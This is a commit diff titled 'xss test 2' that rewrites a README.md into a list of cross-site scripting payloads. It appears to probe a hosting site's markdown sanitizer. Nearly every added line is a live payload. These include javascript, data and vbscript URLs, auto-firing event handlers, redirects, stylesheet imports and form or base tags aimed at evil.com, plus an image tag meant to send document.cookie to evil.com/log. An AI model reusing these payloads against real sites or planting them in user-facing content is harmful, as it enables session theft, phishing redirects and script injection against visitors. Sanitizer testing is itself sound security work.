xss test 2
Browse files
README.md
CHANGED
|
@@ -2,20 +2,42 @@
|
|
| 2 |
license: mit
|
| 3 |
---
|
| 4 |
|
| 5 |
-
|
| 6 |
|
| 7 |
-
<
|
| 8 |
|
| 9 |
-
<
|
| 10 |
|
| 11 |
-
|
| 12 |
|
| 13 |
-
<
|
| 14 |
|
| 15 |
-
<
|
| 16 |
-
<summary>test</summary>
|
| 17 |
-
</details>
|
| 18 |
|
| 19 |
-
<
|
| 20 |
|
| 21 |
-
<
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 2 |
license: mit
|
| 3 |
---
|
| 4 |
|
| 5 |
+
<a href="data:text/html,<script>alert(1)</script>">data url</a>
|
| 6 |
|
| 7 |
+
<a href="vbscript:alert(1)">vbscript</a>
|
| 8 |
|
| 9 |
+
<form action="https://evil.com"><button>submit</button></form>
|
| 10 |
|
| 11 |
+
<base href="https://evil.com">
|
| 12 |
|
| 13 |
+
<link rel="stylesheet" href="https://evil.com/steal.css">
|
| 14 |
|
| 15 |
+
<style>@import url('https://evil.com/steal.css');</style>
|
|
|
|
|
|
|
| 16 |
|
| 17 |
+
<meta http-equiv="refresh" content="0;url=https://evil.com">
|
| 18 |
|
| 19 |
+
<object data="https://evil.com/evil.swf"></object>
|
| 20 |
+
|
| 21 |
+
<embed src="https://evil.com/evil.swf">
|
| 22 |
+
|
| 23 |
+
<video><source onerror="alert(1)"></video>
|
| 24 |
+
|
| 25 |
+
<body onload="alert(1)">
|
| 26 |
+
|
| 27 |
+
<marquee onstart=alert(1)>xss</marquee>
|
| 28 |
+
|
| 29 |
+
<input onfocus=alert(1) autofocus>
|
| 30 |
+
|
| 31 |
+
<select autofocus onfocus=alert(1)>
|
| 32 |
+
|
| 33 |
+
<keygen autofocus onfocus=alert(1)>
|
| 34 |
+
|
| 35 |
+
<video autoplay onloadstart=alert(1)><source src="x"></video>
|
| 36 |
+
|
| 37 |
+
<audio autoplay onloadstart=alert(1)><source src="x"></audio>
|
| 38 |
+
|
| 39 |
+
<img src="https://evil.com/log?cookie="+document.cookie>
|
| 40 |
+
|
| 41 |
+
<svg><use xlink:href="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg'><script>alert(1)</script></svg>#x"/></svg>
|
| 42 |
+
|
| 43 |
+
<math><annotation-xml encoding="text/html"><img src=x onerror=alert(1)></annotation-xml></math>
|